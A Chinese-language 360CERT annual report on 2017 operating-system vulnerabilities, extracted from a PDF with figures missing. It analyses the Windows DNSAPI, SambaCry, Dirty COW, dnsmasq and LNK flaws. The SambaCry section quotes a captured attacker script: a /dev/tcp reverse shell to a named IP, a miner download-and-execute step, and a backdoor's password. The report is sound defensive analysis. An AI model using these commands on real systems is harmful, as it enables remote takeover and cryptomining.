1、360 Computer Emergency Readiness Team, February 2018 文中部分信息直接参考外部文章（见参考），如有侵权或异议请联系 2017 年度安全报告系统漏洞 System Vulnerabilities CVE-2017-11779DNSAPI 堆溢出漏洞 CVE-2017-7494SambaCry 漏洞 CVE-2016-5195/CVE-(Huge)Dirty COW 漏洞 DNSmasq 漏洞 CVE-2017-8464/CVE-2017-8543LNK 漏洞和 Windows Search 漏洞 2017 年度安全报告系

2、统漏洞 360 Computer Emergency Readiness Team, February 20182 系统漏洞是操作系统在逻辑设计上的缺陷或错 误，系统漏洞的危害比一般的软件漏洞要大得 多，成功利用系统漏洞可能会获得操作系统最 高的控制权限。首先 , 我们看一下 2017 年系统 漏洞情况，接下来对今年系统安全漏洞进行详 细分析。本文是 360CERT 对 2017 年系统安 全漏洞的总结。 System Security 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 20183 漏洞情况 2017

3、 年漏洞，一些主流的操作系统，漏洞情况如下： Android，Linux Kernel，Iphone OS 在 2017 年披露的漏 洞最多。 加强系统安全的一些方法 计算机系统安全是个十分宽泛的概念，加强系统安全可以从 安全意识，安全建设两个方面进行考虑。 安全意识 “万物皆变，人是安全的尺度”。用户在使用计算机时，不 要随便打开不安全的网址，来路不明的邮件，文件不要轻易下载。 如果点击或者下载，容易将网络病毒引导计算机中，从而导致安全 问题。 安全建设 安全建设可以从，病毒防御体系，使用防火墙，及时安装系 统补丁三个角度进行。计算机进行网络行为行为前，最好开启杀毒 软件，这样可以防止一些病

4、毒木马或者恶意程序对本机的入侵。因 为现在网络的开放性质，使用防火墙可以减少一部分网络方面的攻 击。系统的安全不是一成不变的，操作系统自身会出现一些漏洞， 攻击者可以利用漏洞对本机进行远程攻击，及时安装系统补丁是很 有必要的。此外加强数字签名和文件措施也是很有必要的。 安全意识加强，安全建设全面也并不能确保计算机系统不会 遭受到攻击，2017 年的 WannaCry 勒索事件，让我们见识到漏 洞的破坏力。接下来，我们对 2017 年系统漏洞进行回顾总结。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 20184

5、2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 20185 2017 年 10 月 10 日，Microsoft 修 复 了 CVE-2017-11779， 其 中涵盖了 Windows DNS 客户端 对 DNSSEC 处理不当引起的多 个内存破坏漏洞。这个漏洞由恶 意的 DNS 响应引发，可以影响 Windows 8/Server 2012 及 更 高版本的系统。攻击者可以利用这 个问题在发出 DNS 请求的应用程 序的上下文中获得任意的代码执 行。 CVE-2017-11779 DNSAPI 堆溢出漏洞 DN

6、SSEC 及漏洞相关背景 由于 DNS 的设计，采用 UDP 协议，导致了很多受攻击的 可能，尤其是启用了递归查询的 DNS 解析服务器。常见的攻击包 括 DNS cache poisoning，中间人攻击和 DOS。为此 ICANN 针对这些漏洞对 DNS 在已有协议不影响的情况下做了增强，这 就 是 DNS Security Extensions (DNSSEC)。DNSSEC 引 入 了数字签名机制，权威域名服务器用自己的私有密钥对资源记录 (Resource Record, RR) 进行签名，解析服务器用权威服务器的 公开密钥对收到的应答信息进行验证。如果验证失败，表明这一报 文可能是

7、假冒的，或者在传输过程、缓存过程中被篡改了。DNS 和 DNSSEC 具体解析过程如下 : DNS 解析过程 DNSSEC 认证解析过程 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 20186 大概的过程是，根增加 KSK（long term key），KSK 签 名 ZSK（short term key），然后 ZSK 为 root 下面的所有第一 级域名（比如 .cn）签名，由于 .cn DS 记录包含在 .cn 中，所以 也就相当于 root 给 .cn 的 DR 签名了。而 DS 记录对应的是 KSK

8、key，于是乎，.cn 又给 的 DS 签名了。这样就形成 了一条完整的信任链。 CVE-2017-11779 这个漏洞就是由于 Windows DNS 客户 端对 DNSSEC 中 NSEC3 记录的 DNS 相应时，没有进行足够 的完整性检查导致的。错误的 NSEC3 记录损坏 DNS 客户端的内 存， 触发此漏洞。 对于一次正常的DNSSEC会话， 差不多是这样的 ： DNS query: DNS response: 可 见 该 DNS response 中 的 Answer RRs 包 含 了 CNAME(0 x0005) 与 A(0 x0001) 两个 Resource record

9、(RR)， 由 于 该 域 名 所 在 的 Domain Zone 并 未 配 置 DNSSEC， 所 以 在 response 中 并 没 有 Authority RRs 与 Additional RRs。 后 面 为 了 把 程 序 执 行 流 引 到 Nsec3_ RecordRead 函数，触发漏洞，在 Authority RRs 中加入特定 NSEC3(0 x0032) 记录即可。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 20187 技术细节 漏洞出在 dnsapi.dll 的 Nsec3_Rec

10、ordRread() 函数中的三 个 memcpy(): 首先第一个位置的 memcpy() 问题出在 index:31 位置的 Dns_AllocateRecordEx() 这个函数。他的作用是为 Dst 分配空 间，往上追溯可以看到其大小其大小取决于 NSEC3 RR 的 Data length 字段。同时 Src 和 Size 也是由数据报文的相应字段进行 指定。Dst,Src,Size 都是可控的。 第 二 个 memcpy() 同 理， 只 不 过 可 控 的 字 段 为 Hash length。 第 三 个 memcpy() 这 里，memcpy(void *)(v15 + v12

11、 + v10 + 32), 这里的 v13 = v14 - v12 - v10; 其中 v12,v10 由上面两个可控字段计算得到的。所以此处的 v13 也是可控的。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 20188 构 建 处 理 DNS 请 求 的 PoC， 将 Salt length 字 段 设 为 255，开启一台虚拟机，宿主上运行 PoC，虚拟机中将 DNS 地 址设为宿主 IP, 将流量打印出来： 虚拟机流量捕获到的 DNS 为： 对于该漏洞，系统会对溢出导致的进程崩溃自动重启，上层 用户感受

12、不到，挂载 windbg 最终可以看到： 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 20189 官方修复 补丁对传入的 a5 多了一步验证，并且两次 memcpy() 更换 为 Dns_StringCopy()。这样使得外部对传入的参数不可控制。 DNSSEC 是为了改善 DNS 设计上的一些固有弊端，但是 windows 在对其支持的时候，将不可信数据作为参数进行处理。 攻击者利用 memcpy() 溢出，在绕过 ASLR、DEP 等缓解措 施后可以实现无交互远程 RCE。浏览网页，时间同步都会产生 DNS

13、 请求，如果是 Windows Update 这样的应用触发，攻击者 代码执行的权限会是 SYSTEM。 该漏洞的应用场景十分广泛，在 DNS 被劫持的情况下，很 容易被触发，比如在机场，图书馆或者 Starbucks 等公共网络环 境上网，攻击者可以利用中间人攻击的方式，伪造 DNS 服务；又 或者侵入家用路由器，修改 DNS 服务配置发起远程攻击。建议广 大用户，及时更新相关补丁。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201810 CVE-2017-7494 SambaCry 漏洞 技术细节 如官方

14、所描述，该漏洞只需要通过一个可写入的 Samba 用 户权限就可以提权到 samba 所在服务器的 root 权限（samba 默 认是 root 用户执行的）。 从 Patch 来 看 的 话，is_known_pipename 函 数 的 pipename 中存在路径符号会有问题： 2017 年 5 月 24 日 Samba 发 布 了 4.6.4 版 本， 中 间 修 复 了一个严重的远程代码执行漏 洞， 影 响 Samba 3.5.0 之 后 到 4.6.4/4.5.10/4.4.14 中间的所有版 本。360 网络安全中心 和 360 信息安全部的 Gear Team 第一 时间对该

15、漏洞进行了分析，确认属 于严重漏洞，可以造成远程代码执 行。 再延伸下 smb_probe_module 函数中就会形成公告里说的 加载攻击者上传的 dll 来任意执行代码了： 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201811 具体攻击过程： 构造一个有/符号的管道名或路径名，如“/home/ toor/cyg07.so”； 通过 smb 的协议主动让服务器 smb 返回该 FID； 后续直接请求这个 FID 就进入上面所说的恶意流程。 具体攻击结果如下： 1. 尝试加载“/home/toor/cyg0

16、7.so”恶意 so： 2. 其中 so 代码如下 ( 加载时会调用 samba_init_module 导 出函数 )： 3. 最后我们可以在 /tmp/360sec 中看到实际的执行权限 ( 带 root 权限 )： 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201812 野外利用 卡巴斯基捕获的针对 linux 主机的野外利用 就在漏洞修复短短几天之后卡巴斯基就通过蜜罐捕获了一 个通过 SambaCry 漏洞恶意挖矿的攻击。360 网络安全中心和 360 追日团队对该事件所使用的后门进行了具体的技术分析

17、。从 卡巴斯基的蜜罐捕获的攻击包来看，攻击者首先对 server 尝试写 入一个随机字符名的文件，成功后则删除。 在检测成功有可写权限后，攻击者暴力猜解写入文件的完整 路径，以获得共享目录路径，并写入恶意 lib 作为 payload。 在爆破到正确的路径后利用 CVE-2017-7494 漏洞加载恶 意 lib 执行命令，因为 samba 默认是以 root 权限启动，所以之后 加载 lib 执行的命令也将以 root 权限执行，成功利用后则删除写入 的 lib，只在内存中执行恶意命令操作。在 INAebsGB.so 中，攻 击者用 /bin/sh 执行了一个非常简单的反弹 shell 操作

18、，从而执行 下载文件或者执行后续命令。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201813 发现这个 lib 其实就是 metasploit 的 is_known_pipename 模块 生成的。其后，写入了另一个 libcblRWuoCc.so，在这个 lib 中， 攻击者反弹 shell 到 C2 服务器 4000 端口并下载了一个挖矿程序， 将 bot 作为 CPU 矿机使用。 攻击者下载 http:/rc.ezreal.space/minerd64_s 并存于 /tmp/m 赋予权限后 nohup

19、 执行。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201814 在连接 C2 服务器 rc.ezreal.space 4000 端口后，看到了以下脚 本： #!/usr/bin/env bash host=149.255.35.33; nohup bash -i /dev/tcp/$host/4001 host=45.76.146.166; target=$RANDOM; target+=.so; target=/ tmp/$target; cat $target & chmod +x $target &

20、nohup $target & 访 问 45.76.146.166:5555 又 得 到 一 个 miner 程 序， 该 miner 的区别在于矿池和钱包地址： 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201816 趋势科技捕获的针对 IOT 设备的野外利用 7 月 3 日趋势科技发现了针对 IOT 设备的 SambaCry 的野外利用并命名为 ELF_SHELLBIND.A。和之前在野外使用 SambaCry 的情况类似，它也会在目标系统上打开一个 shell 命 令。但是 ELF_SHELLBIND.

21、A 已经有了明显的区别，可以将它 与早期利用 SambaCry 的恶意软件区分开来。一方面它主要针对 物联网设备，特别是中小企业青睐的网络存储 (NAS) 设备；另一 方面 ELF_SHELLBIND 还针对不同的架构，如 MIPS，ARM 和 PowerPC。正如下图，ELF_SHELLBIND.A 通常作为恶意共享 对象 (.SO) 文件到达公共文件夹。它试图利用 SambaCry，因为 它是通过导出函数 samba_init_module 调用的。将 .SO 文件上 传到Samba公共共享文件夹后， 攻击者需要猜测绝对本地文件名， 并发送 IPC 请求，诱使服务器加载并运行本地存储的程序

22、文件。 一旦通过所述导出功能加载恶意程序，它将通过调用 Samba 守 护程序 (SMBv2) 所需的函数 change_to_root_user 开始，以 root 身份或当前用户的 EUID 运行。然后将自身从其运行的任何 父进程 (Samba 服务器进程 ) 分离出来，并通过函数 detach_ from_parent 守 护 进 程。 这 之 后 发 送 所 谓 的 Knock 消 息 到 CC 服 务 器 169.239 .128 .123。Knock 消 息 只 包 括 HEAD/ HTTP/1.0。服务器会读取这一响应，但不会以任何方式使用它。 此时 socket 已经关闭，而到

23、这个阶段，攻击者已经获得了系统 的 IP 地址。之后修改 iptables 以便防火墙 61422 端口上的所有 TCP 通信能够通过防火墙。之后在监听模式下通过端口 61422 打 开 TCP socket，接受来自攻击者的连接。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201817 一旦攻击者连接到此 socket 就会发送消息：Welc0me to shell，Enter password。恶意程序希望攻击者输入密码： Q8pGZFS7N1MObJHf。如果攻击者使用所述密码进行回复会 发送消息：Ac

24、cess granted，如果是不正确的密码则退出。 一旦成功建立连接并且通过身份验证，攻击者将在被感染系 统中有一个打开的 shell 命令，基本上就控制该设备了。恶意程序 使用位于 /bin/sh 的系统 shell 执行任何它通过 socket 接收的内 容 (stdin，stdout 和 stderr 都重定向到 socket）。 从 SambaCry 漏洞披露之初我们就预计将会有黑客对其进 行恶意利用并从中获利。黑客攻击正在变得常态化，尤其是有通用 且极易利用漏洞曝光时，攻击事件也可能随之而来。随着比特币的 增值，其他虚拟货币价值也伴随增长，这也给黑客通过网络攻击进 行获利提供了变现

25、渠道。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201818 CVE-2016-5195 CVE- (Huge) Dirty COW 漏洞 相关知识 大页面和透明大页面 内存是由块管理，即页面。一个页面有 4096 字节。1MB 内 存等于 256 个页面。1GB 内存等于 256000 个页面等等。CPU 有内嵌的内存管理单元，这些单元中包含这些页面列表，每个页面 都使用页表条目参考。 让系统管理大量内存有两种方法： 增加硬件内存管理单元中页表数 增大页面大小 第一个方法很昂贵，因

26、为现代处理器中的硬件内存管理单元 只支持数百或者书签页表条目。另外适用于管理数千页面（MB 内 存）硬件和内存管理算法可能无法很好管理数百万（甚至数十亿） 页面。这会造成性能问题：但程序需要使用比内存管理单元支持的 更多的页面，该系统会退回到缓慢的基于软件的内存管理，从而造 成整个系统运行缓慢。所以更多的发行版 linux 采用第二种方法， 2017 年披露的 Dirty COW 漏洞引起了轩然大波，这个漏洞 存在于每一个 Linux 系统里，包 括安卓设备，服务器和个人 PC， 直接影响数百万用户。该补丁是 Linux 的的创始人莱纳斯亲自打上 的。但是修复并不完善，11 月 30 日，国外

27、安全团队 Bindecy 披露 了名为大脏牛 (Huge Dirty Cow) 的内核提权漏洞。问题出在 can_ follow_write_pmd的逻辑处理， 可以使用与原来的 Dirty COW 竞 争条件漏洞类似的模式，进行系统 提权。 即使用超大页面。简单说，超大页面是 2MB 和 1GB 大小的内存 块。2MB 使用的页表可管理多达 GB 的内存，而 1GB 页是 TB 内存的最佳选择。超大页面必须在引导时分配。它们也很难手动管 理，且经常需要更改代码以便可以有效使用。因此许多 Linux 发 行版部署了透明超大页面 (THP)。THP 是一个提取层，可自动创 建、管理和使用超大页面

28、。THP 系统管理员和开发者减少了很多 使用超大页面的复杂性。因为 THP 的目的是改进性能，所以其开 发者已在各种系统、配置、程序和负载中测试并优化了 THP。这 样可让 THP 的默认设置改进大多数系统配置性能。但是，THP 目前只能映射异步内存区域，比如堆和栈空间。透明大页是通过 将 PMD（一个高于 PTE 的级别）的 _PAGE_PSE 位置 1 来实 现的。因此，PMD 指向的是 2MB 的物理页，而并非 PTE 目录。 在每次扫描页表时，都必须使用 pmd_trans_huge 函数来检查 PMD，这样我们就可以确定 PMD 是指向 PFN 还是指向了 PTE 的一个目录。在一些

29、结构上，巨大的 PUD 也可以存在，将会导致 产生 1GB 的内存页。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201819 历史漏洞回顾 去年的 CVE-2016-5195 是一枚竞争条件漏洞。条件竞争 指的是任务执行顺序异常， 可导致应用崩溃， 或令攻击者有机可乘， 进一步执行其他代码。首先从关键的获取用户进程内存页的函数函 数 get_user_pages 看起 ,get_user_pages 系列函数用于获取 用户进程虚拟地址所在的页 (struct page)，返回的是 page 数组 , 该函数

30、最终都会调用 _get_user_pages。 _get_user_pages 函数中每次查找 page 前会先调用 cond_resched()，这样就引入了竞态条件的可能性。在第二次 分配 COW 页成功后，FOLL_WRITE 标记已经去掉，如果此 时，另一个线程把 page 释放了，那么第三次由于 page 不在内 存中，又会进行调页处理，由于不带 FOLL_WRITE 标记，不会 进行 COW 操作，此时 get_user_pages 得到的 page 带 _ PAGE_DIRTY，竞态条件就是这样产生的，流程如下： 第一次 follow_page_mask(FOLL_WRITE)，

31、page 不在 内存中，进行 pagefault 处理。 第二次 follow_page_mask(FOLL_WRITE)，page 没有 写权限，去掉 FOLL_WRITE。 另一个线程释放上一步分配的 COW 页 第三次 follow_page_mask( 无 FOLL_WRITE)，page 不 在内存中，进行 pagefault 处理。 第四次 follow_page_mask( 无 FOLL_WRITE), 成功返回 page，但没有使用 COW 机制。 后面我们再看下怎么修补的： 在 faultin_page 中做了如下修改： 新增了一个由 follow_page_mask 调用的

32、新函数： 该修复方式并不是减少所请求的权限，而是让 get_user_ pages 记录是否经过了一次 COW 循环。在下个迭代中，只有当 指定了 FOLL_FORCE 和 FOLL_COW 标志并且该页表条目被 标记为“Dirty”时，才能对只读页执行写操作。 这样的修复方式需要建立在私有只读页副本不会有包含页面 重写标志位 (Dirty bit) 的页表条目指向它的前提下。然而，这个前 提有时是不能保证的。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201820 技术细节 在脏牛补丁代码中的处理 THP

33、的部分，我们可以看到，具 有同样逻辑 can_follow_write_pte 适用于巨大的 PMD。补丁增 加了一个名为 can_follow_write_pmd 的匹配函数： 然而，在 PMD 较为巨大的情况下，如果使用 touch_pmd 函数，内存页则可以被标记为 Dirty 而不经过 COW 循环： 在每次 get_user_pages 试图获取一个大页时，该函数会 被调用。显然，上面的注释并不正确，此时的 Dirty bit 并非没有 意义。特别是当使用 get_user_pages 来读取一个巨大的页， 该页将被标记为 Dirty 同时不会经历 COW 周期，这就说明原来 can

34、_follow_write_pmd 的逻辑已经被打破。在这一点上，我们 就能直接利用这个 BUG，可以使用一个与原来的脏牛竞争条件漏 洞类似的模式。这一次，我们去掉了内存页的复制版本，并让原 始页故障两次，第一次让执行流程到达 touch_pmd，第二次是将 Dirty bit 置为 1。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201821 Android 设备上 Dirty Cow 的野外利用 2017 年 9 月趋势科技的安全研究人员报告了第一种利用 该漏洞的恶意程序家族 ZNIU。ZNIU 应用通过

35、第三方应用市场传 播，藏身于色情应用和游戏应用中。 一旦安装，它会连接 CC 服务器，同时使用 DirtyCow 漏洞获取 root 权限和植入后门。由于 DirtyCow 漏洞只能工作在 ARM/ X8664 位架构设备上，ZNIU 会使用 KingoRoot（一个 rooting 程序 ) 和 Iovyroot(CVE-2015-1805) 去 root 32 位设备。之后 ZNIU 会订阅中国移动运营商的增值服务，从屏幕截图上看受害者 可能主要是中国电信的用户。 Huge Dirty COW 漏洞是之前 Dirty COW 漏洞基础上的补 丁绕过版本，通过零页面，透明大页、shmem 和

36、封装文件等一些 机制，进行系统提权。360CERT 建议使用相关产品的用户对相 应漏洞进行安全更新。这一漏洞说明了在安全开发的生命周期中， 对修复程序进行审计也是非常重要的。根据脏牛和其他一些漏洞的 以往经验，有一些漏洞的官方补丁并没有完整修复。并且，这种情 况不仅仅出现在闭源软件上，开源软件也出现过此类的问题。 由于 Android 系统生态的碎片性，用户往往不能及时打上补 丁。 既 CVE-2014-3153，CVE-2015-1805 等 Android 病 毒 常用 root 漏洞之后，Dirty Cow 的出现给了犯罪分子更多的选择。 Android 系统的安全性面临的问题仍然十分严

37、峻。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201822 DNSmasq 漏洞 漏洞分析 CVE-2017-14491: 严重 CVE-2017-14491 是这批漏洞列表中最严重的漏洞，且影 响了 dnsmasq 大部分版本。攻击者需要一个可控的恶意域名并发 送 DNS 请求到 dnsmasq，从而让 dnsmasq 缓存下域名返回的 请求。再通过精心构造的 DNS 请求和回复，会导致 dnsmasq 出 现堆上的内存越界，该漏洞可能造成任意代码执行。 dnsmasq 作 为 一 个 轻 量 级 的 D

38、NS 和 DHCP 服 务 器， 得 益 于它的简单易用，在中小企业环 境和云平台中被广泛使用，包 括 libvirt 等在内组件都会直接使 用它作为支撑。2017 年 10 月 2 日 Google 安全团队发现的多个 dnsmasq 安全漏洞被披露。其中 漏洞编号为 CVE-2017-14491， CVE-2017-14492，CVE- 2017-14493 的三个漏洞被相关 厂商标记为严重等级，剩余编号 为 CVE-2017-14494，CVE- 2017-14495，CVE-2017- 14496，CVE-2017-13704 的 漏洞被标记为重要等级。 内存越界信息： 2017 年度

39、安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201823 CVE-2017-14492 和 CVE-2017-14493: 严重 这2个漏洞均存在于IPv6/DHCPv6功能中， 一个是堆越界， 另一个是栈越界。两个漏洞都可能造成代码执行，其中 CVE- 2017-14493的代码执行风险可以被Gcc Stack Protector缓解。 实际环境里，这 2 个漏洞需要 dnsmasq 开启了 DHCP 且 被绑定到 IPv6 接口的情况下才能被触发。此外，攻击者需要在本 地网络中且需要一个主机的 root 权限来构造特定的

40、 DHCPv6 或 IPv6 Router Advertisement 消息来攻击。 需 要 注 意 的 是 dnsmasq 在 2.60 版 本 之 后 才 开 始 支 持 DHCPv6 和 IPv6 Router Advertisement，所以此前的版本不 受影响。 CVE-2017-14494: 重要 该漏洞存在于 DHCPv6 功能实现中，可造成 dnsmasq 内 存读取越界并通过 DHCPv6 返回包泄露给攻击者。如前面漏洞所 述的，该漏洞影响了版本 2.60 到 2.77，在版本 2.78 中被修复。 dnsmasq 提供 DNS 缓存和 DHCP 服务功能。作为域名 DNS，

41、dnsmasq 可以通过缓存 DNS 请求来提高对访问过的网址 的连接速度。作为 DHCP 服务器，dnsmasq 可以用于为局域网 电脑分配内网 ip 地址和提供路由。该软件通常安装在桌面 Linux 发行版，家庭路由器和物联网设备等多种系统中，在互联网和私人 网络中广泛使用。建议广大用户及时更新相关补丁。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201824 CVE-2017-8464 CVE-2017-8464 又被称为“震网三代”，Windows 系 统在解析快捷方式时存在远程执行任意代码的高危漏洞

42、，攻击者可 以向用户呈现包含恶意的 .LNK 文件和相关联的恶意二进制文件的 可移动驱动器或远程共享。当用户在 Windows 资源管理器或解 析 .LNK 文件的任何其他应用程序中打开此驱动器 ( 或远程共享 ) 时，恶意二进制程序将在目标系统上执行攻击者选择的代码，成功 利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 该漏洞利用代码已被公开，且利用方式简单，未来可能会出 现利用该漏洞的大规模攻击。 在 2017 年 6 月份微软补了两个已 经被用于野外攻击的漏洞：CVE- 2017-8464 和 CVE-2017- 8543。 CVE-2017-8464/CVE-2017-8543

43、LNK 漏洞和 Windows Search 漏洞 .lnk 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201825 CVE-2017-8543 当 Windows 搜索处理内存中的对象时，存在远程执行 代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。 360CERT 第一时间确认了该漏洞存在被远程攻击的可行性。 为了利用此漏洞，攻击者会向 Windows Search 服务发送 经特殊设计的消息。有权访问目标计算机的攻击者可以利用此漏洞 提升特权并控制目标计算机。此外，在企业情形中，未经过身份验 证的

44、远程攻击者可能会通过 SMB 连接远程触发此漏洞，然后控制 目标计算机。 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201826 总结 2017 年各大操作系统都出现了影响力不小的漏洞，并且不少 的漏洞都已经被利用于野外攻击。去年席卷全球的脏牛漏洞带来的 冲击还历历在目，今年就出现了利用脏牛漏洞的 Android 病毒； 利用 SambaCry 的病毒不仅将目标盯上了传统的 linux 主机，还 有数量众多的 IOT 设备。 Wanncry 勒索软件通过 MS17-010 漏洞进行攻击和传播， 俨然是一场全球

45、性互联网灾难，给广大电脑用户造成了巨大损失。 这次大规模网络网络攻击让我们看到了系统级安全漏洞的危害。我 们研究漏洞，不应该只停留在技术分析。SMBv1 是否应该弃用？ 这种勒索行为在将来会有如何的发展趋势？这些深层次的东西才是 我们应该思考的。我们相信，未来系统漏洞带来的危害只会愈演愈 烈，需要做好充分的防范。 System Security 2017 年度安全报告系统漏洞 360 Computer Emergency Readiness Team, February 201827 参考 %A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9Ecve-2017-

46、7494%E5%88%86%E6%9E%90/ %E7%94%A8%E5%88%86%E6%9E%90/ 11779 buffer-overflows-in-the-windows-dns-client/ https:/justanotherbuganalysis.github.io/windows-dnsapi-remote-code- execution-vulnerability-analysis.html html/performance_tuning_guide/s-memory-transhuge malware-exploit-dirty-cow-vulnerability/ update-new-threat-exploits-sambacry/ html vulnerabilities/124629/ 360CERT 全称“360 Computer E m e r g e n c y R e a d i n e s s Team”，我们致力 于维护计算机 网络空间安全， 是360公司基于 “协 同联动， 主动发现， 快速响应” 的指导原则，对重大网络安全事件 进行快速预警、应急响应的安全协 调团队。 微信公众号 新浪微博 关于 360CERT